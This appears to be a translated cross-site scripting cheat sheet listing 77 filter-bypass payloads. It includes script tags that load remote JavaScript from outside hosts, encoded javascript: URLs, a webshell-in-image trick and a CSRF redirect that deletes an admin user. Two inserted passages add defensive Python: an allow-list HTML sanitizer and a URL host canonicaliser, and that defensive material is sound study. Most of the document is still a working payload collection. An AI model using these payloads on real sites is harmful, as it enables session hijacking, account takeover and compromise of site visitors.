Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the webshell ("trojan"), and change the shell into JPG image format; when the image-format shell is accessed, our shell is executed as well.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective in China, because there is nowhere to use them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
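Items 3 to 19 and 31 to 55 above are all the same javascript: URL, respelled so that a naive string match for "javascript:" misses it: mixed case, HTML entities, embedded tabs, newlines, NUL bytes and leading spaces, and placed in attributes other than SRC. The defensive lesson is that a check has to normalise the value the way a browser does before looking at the scheme, allow-list schemes rather than blacklist spellings, and rebuild markup from an allow-list of tags and attributes. The Python below is an added illustration of that approach and is not code from the original post. The tag and attribute allow-lists are assumptions chosen for the demonstration, the sample inputs are constructed from the variants listed above, and it uses the standard library html.parser, whose tokenizer does not track browser parsing quirks (the sort exploited in items 20 to 27); for production use a maintained sanitizer library.

```python
import html
import re
from html.parser import HTMLParser

# Tags the sanitizer keeps (an assumed allow-list for this demo). Everything
# else (SCRIPT, STYLE, LINK, META, BASE, IFRAME, FRAMESET, EMBED, BGSOUND,
# BODY, ...) is removed.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "div", "span",
                "ul", "ol", "li", "img", "table", "tr", "td"}
# Removed tags whose text content is dropped too (script and CSS bodies).
DROP_CONTENT_TAGS = {"script", "style"}
# Attributes that carry a URL and therefore need a scheme check.
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "action", "formaction"}
SAFE_SCHEMES = {"http", "https", "mailto"}
# Browsers ignore NUL, tab, newline, CR and leading spaces inside a scheme, so
# "jav\tascript:", "java\0script:" and " javascript:" all run (items 11-19).
_SCHEME_NOISE = re.compile(r"[\x00-\x20]")


def url_scheme(value):
    """Return the scheme a browser would actually see for an attribute value,
    lower-cased, or '' for relative and scheme-less URLs."""
    decoded = html.unescape(value)              # numeric/named entities (item 5)
    cleaned = _SCHEME_NOISE.sub("", decoded)    # embedded control characters
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def url_is_safe(value):
    """Allow-list check: relative URLs and http/https/mailto pass; everything
    else (javascript:, vbscript:, data:, ...) fails regardless of spelling."""
    scheme = url_scheme(value)
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises a fragment keeping only allow-listed tags, dropping all
    on* event handlers and style attributes, and rejecting unsafe URLs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropping = None   # name of the script/style tag we are inside

    def handle_starttag(self, tag, attrs):
        if self._dropping:
            return
        if tag not in ALLOWED_TAGS:
            if tag in DROP_CONTENT_TAGS:
                self._dropping = tag
            return                      # tag removed, its children kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name == "style":
                continue                # onload=..., style="...expression(...)"
            if name in URL_ATTRS and not url_is_safe(value):
                continue                # javascript: in src/href/background
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.handle_starttag(tag, attrs)   # <img .../> and other void tags

    def handle_endtag(self, tag):
        if self._dropping:
            if tag == self._dropping:
                self._dropping = None
            return
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(html.escape(data, quote=False))   # re-encode text


def sanitize(fragment):
    """Return a sanitised copy of an untrusted HTML fragment."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed samples taken from the variants listed above.
    for sample in ("<IMG SRC=JaVaScRiPt:alert('XSS')>",
                   "<IMG SRC=\"jav\tascript:alert('XSS');\">",
                   '<BODY onload=alert("XSS")>hello',
                   '<a href="http://3w.org/">link</a>'):
        print(repr(sample), "->", repr(sanitize(sample)))
```

The important ordering is decode first, strip the characters browsers discard second, and only then compare the scheme against the allow-list; checking the raw string in any other order lets the encoded and split variants through. Dropping the on* and style attributes wholesale rather than inspecting them removes the BODY onload, expression() and background-image cases in one step.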
(56) Using ActionScript inside Flash, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL detour
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
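Items 68 to 77 are not script injection but allow-list bypasses: the same host written as a decimal, hexadecimal or octal literal, with a trailing dot, with tabs inside it, or wrapped in a javascript: link. A link or redirect allow-list that compares raw strings accepts none of the spellings it was meant to block. The Python below is an added example, not code from the original post: it re-implements the legacy IPv4 literal rules browsers apply (one to four dot-separated numbers, 0x hexadecimal, leading-zero octal, the last number filling the remaining bytes), removes ASCII tab and newline as the WHATWG URL parser does, and compares the canonical host against an allow-list. The allow-list contents and the sample URLs are constructed for the demonstration; the numeric addresses are the ones from items 70 to 73.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One dotted part of a legacy IPv4 literal: 0x-hex, leading-zero octal, or decimal.
_PART = re.compile(r"0[xX][0-9A-Fa-f]*|0[0-7]*|[1-9][0-9]*")
# The WHATWG URL parser deletes ASCII tab and newline anywhere in the input,
# which is why "h\tt\tt\tp://6\t6...." (item 73) still resolves in a browser.
_TAB_NEWLINE = re.compile(r"[\t\n\r]")


def parse_legacy_ipv4(host):
    """Interpret a host the way browsers' legacy IPv4 parser does: one to four
    dot-separated numbers, each decimal, 0x-hex or 0-prefixed octal, with the
    last number filling all remaining bytes. Returns the canonical dotted quad,
    or None if the host is not such a literal (e.g. a domain name)."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":  # tolerate one trailing dot
        parts = parts[:-1]
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not _PART.fullmatch(p):
            return None
        if p[:2].lower() == "0x":
            nums.append(int(p[2:] or "0", 16))
        elif len(p) > 1 and p[0] == "0":
            nums.append(int(p, 8))
        else:
            nums.append(int(p, 10))
    if any(v > 255 for v in nums[:-1]):     # leading parts are single bytes
        return None
    tail_bytes = 5 - len(nums)              # bytes the last number must fill
    if nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for v in nums[:-1]:
        value = value * 256 + v
    value = value * 256 ** tail_bytes + nums[-1]
    return str(ipaddress.IPv4Address(value))


def canonical_host(url):
    """Host an allow-list should compare against: tabs/newlines removed,
    lower-cased, trailing dot removed, numeric literals as dotted quads."""
    url = _TAB_NEWLINE.sub("", url)
    host = urlsplit(url).hostname or ""     # urlsplit lower-cases the host
    host = host.rstrip(".")                 # "www.google.com." (item 76)
    return parse_legacy_ipv4(host) or host


def host_allowed(url, allowed_hosts):
    """True only for http(s) or scheme-relative URLs whose canonical host is
    on the allow-list; javascript: and other schemes fail before any host
    comparison (item 77)."""
    url = _TAB_NEWLINE.sub("", url)
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("", "http", "https"):
        return False
    host = canonical_host(url)
    return bool(host) and host in allowed_hosts


if __name__ == "__main__":
    # Constructed allow-list and samples; 3232235521 etc. are items 70-73 above.
    allowed = {"192.168.0.1", "www.google.com"}
    for sample in ("http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
                   "http://0300.0250.0000.0001/", "http://6\t6.000146.0x7.147/",
                   "http://www.google.com./", "http://google.com/",
                   "javascript:document.location='http://www.google.com/'"):
        print(repr(sample), "->", canonical_host(sample), host_allowed(sample, allowed))
```

Note that item 75 (dropping www) is a genuinely different host, so the allow-list has to name every host that is really intended rather than rely on string prefixes; and a scheme-relative URL (item 74) passes the scheme check deliberately, since it resolves to http or https, so its host is still compared.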